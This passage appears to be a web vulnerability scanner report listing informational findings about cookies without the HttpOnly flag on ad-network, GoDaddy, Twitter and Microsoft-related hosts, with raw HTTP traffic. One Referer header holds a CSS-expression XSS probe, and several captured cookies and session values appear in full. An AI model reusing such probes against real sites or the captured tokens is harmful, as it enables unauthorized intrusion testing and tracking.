Severity:	Information
Confidence:	Certain
Host:	http://am.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_3dqj=44%3A4528%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
rth=2-lqupie-44~4528~1~1-ndp~y5~1~1-exv~0~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.10. http://am.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://am.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_7dx8=44%3A1nxhp%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/
rth=2-lpay4l-44~1nxhp~1~1-ltn~xc1g~1~1-3rj~jjg5~1~1-f5h~j7wq~1~1-45~bitw~1~1-6ju~a92r~1~1-eww~a872~1~1-3ri~2h5f~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:56:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.11. http://api.flickr.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.flickr.com
Path:	/clientaccesspolicy.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

localization=en-us%3Bus%3Bus; expires=Sat, 31-Aug-2013 13:08:20 GMT; path=/; domain=.flickr.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.12. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline/msnewengland.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

original_referer=OTZIBTkFw3vYp%2FBMUg4b7T4B5g%2BzzNBf74aOd5w5n3nDOQkgNed6OJLUuIobmU96yc8jAtFxZR9no3nLVaMrr1KJ4TGd50qN1EV9hxNzFVMFzbCHe5quZhHVbmpuwkjpV7ztueQSviIMnOQlXfWj0hLqdh2IsSWra2SKzXw17GNUsWwoiYAp2NEm8KSwMa38; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/msnewengland.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.527256862920519 HTTP/1.1
Host: api.twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?%22?search=7049b%22style%3d%22x%20%3aexpression(alert(1))%20%22c711dde2c4%22
Cookie: guest_id=v1%3A131220472331773196; __utma=43838368.1381732871.1312402661.1312402661.1313158153.2; __utmz=43838368.1313158153.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=43838368.lang%3A%20en; k=50.23.123.106.1315057356690299

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:21:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315059715-88680-46684
X-RateLimit-Limit: 150
ETag: "d6715ce9f0c1e79626dc79a82e11136d"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 14:21:55 GMT
X-RateLimit-Remaining: 117
X-Runtime: 0.02658
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 33c5077e66a29112e5648db50c44d0bf3dfde71d
X-RateLimit-Reset: 1315062687
Set-Cookie: original_referer=OTZIBTkFw3vYp%2FBMUg4b7T4B5g%2BzzNBf74aOd5w5n3nDOQkgNed6OJLUuIobmU96yc8jAtFxZR9no3nLVaMrr1KJ4TGd50qN1EV9hxNzFVMFzbCHe5quZhHVbmpuwkjpV7ztueQSviIMnOQlXfWj0hLqdh2IsSWra2SKzXw17GNUsWwoiYAp2NEm8KSwMa38; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCNDMqi8yAToHaWQiJTEwNzljZDk3Y2JmMGI3%250AYzExYzgwZjI3MGExZGNkMjM3IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--af16b2ebca57d874237053c36043967ac7180535; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 72089
Connection: close

twitterCallback1([{"retweeted_status":{"id_str":"109776676589801472","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"C0DFEC","protected":false,"id_str":"259784927"
...[SNIP]...

11.13. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 13:12:30 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.14. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Mon, 02-Sep-2013 12:56:28 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.15. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/
cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A749%3B09%2F17%2F2011%3BDOTM5; Domain=.contextweb.com; Expires=Sun, 07-Aug-2016 21:33:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.16. http://c7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFAbh=977B305,20|149_1#365:826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:29 GMT;domain=.zedo.com;path=/;
FFBbh=977B305,20|149_1#0:826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:29 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.17. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.18. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.19. http://cf.addthis.com/red/usync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/usync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%226%22%3A%226422714091563403120%22%7D..1315071277.1WV|1315071141.10R|1315071141.1FE|1315071141.60|1315071141.1EY|1314983342.1OD; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:34:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.20. http://community.research.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.research.microsoft.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 03 Sep 2011 08:26:47 GMT; expires=Sun, 02-Sep-2012 13:26:47 GMT; path=/
CSAnonymous=7ae6ffeb-cdb2-483f-8991-07caf2fbdb8f; expires=Sat, 03-Sep-2011 13:46:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: community.research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 03 Sep 2011 08:26:47 GMT; expires=Sun, 02-Sep-2012 13:26:47 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: CSAnonymous=7ae6ffeb-cdb2-483f-8991-07caf2fbdb8f; expires=Sat, 03-Sep-2011 13:46:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:26:47 GMT
Connection: close
Content-Length: 28641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

11.21. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
clid=2lqt1dm01170vf1kj11kp2en05i0c00d6u02100d908; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/
rdrlst=41c0sh6lqupib000000086u021d6blqupib000000086u021byalqtqj10000000b6u02120zlqupib000000086u0213kulqupib000000086u0216pilqwj0f000000046u020x18lqupib000000086u0218k8lqupib000000086u0216pelqtqj10000000b6u0218ldlqwnn2000000036u0218lclqupib000000086u0218erlqtqj10000000b6u02163mlqupib000000086u0218etlqwj0f000000046u0209pglqupib000000086u021679lqupib000000086u020dhvlqupib000000086u020dhxlqwj0f000000046u0218lplqupib000000086u0214kelqtqj10000000b6u0218lqlqwj06000000056u0214khlqwj0f000000046u0214hnlqwj0f000000046u0218l0lqtqsb000000096u020lm0lqupib000000086u020lw4lqwj0f000000046u0217fllqupib000000086u0217gxlqtqj10000000b6u0218kzlqwj02000000066u020lm4lqupib000000086u020llslqupib000000086u020zpelqwj0f000000046u021192lqyjdy000000026u020zpclqtqj10000000b6u0219ezlqtqj10000000b6u0218knlqw8s9000000076u0206pblqupib000000086u0218kmlqtqjn0000000a6u020afolqupib000000086u0207sylqupib000000086u020kkjlqupib000000086u020drhlqupib000000086u0210telqyjdy000000016u0114bxlqwj0f000000046u0214bulqtqj10000000b6u021cyqlqtqj10000000b6u020huxlqtqj10000000b6u0216d5lqwj0f000000046u02; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:22 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt10; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response

11.22. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6?pv=41622699308.20912&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:30:27 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6/3NUTGTWFSRFIPAWBFDEMYM.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

11.23. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFAbh=950B809,20|3_2#392Z10_1#365:305,20|458_1#371Z145_2#371;expires=Fri, 02 Dec 2011 21:56:38 GMT;domain=.zedo.com;path=/;
FFBbh=962B809,20|3_2#30Z10_1#0:305,20|145_2#3Z458_1#0;expires=Sun, 02 Sep 2012 21:56:38 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.24. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ZFFAbh=977B826,20|121_977#365;expires=Fri, 02 Dec 2011 21:40:25 GMT;domain=.zedo.com;path=/;
ZFFBbh=977B826,20|121_977#0;expires=Sun, 02 Sep 2012 21:40:25 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.25. http://ds.addthis.com/red/psi/sites/vasco.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/vasco.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:22 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:22 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071141.10R|1315071142.1WV|1315071141.1FE|1314983342.1OD|1315071141.60|1315071141.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

11.26. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=12290=734380&7435=734382; domain=.interclick.com; expires=Fri, 03-Sep-2021 21:34:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.27. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.28. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.29. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=78_1409703834; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:23:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.30. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Portals/0/app_v_feat.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=6C7CC4F5569112C2183A9F0A7D693744; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/app_v_feat.jpg HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6C7CC4F5569112C2183A9F0A7D693744; path=/
Last-Modified: Fri, 12 Mar 2010 19:45:48 GMT
X-Cache-Info: caching
Content-Length: 10482

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

11.31. http://microsoftcambridge.com/Portals/0/portal.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Portals/0/portal.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/portal.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/
Last-Modified: Tue, 24 Mar 2009 15:35:27 GMT
X-Cache-Info: caching
Content-Length: 2

11.32. http://microsoftcambridge.com/Portals/0/rss.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://microsoftcambridge.com
Path:	/Portals/0/rss.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/rss.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
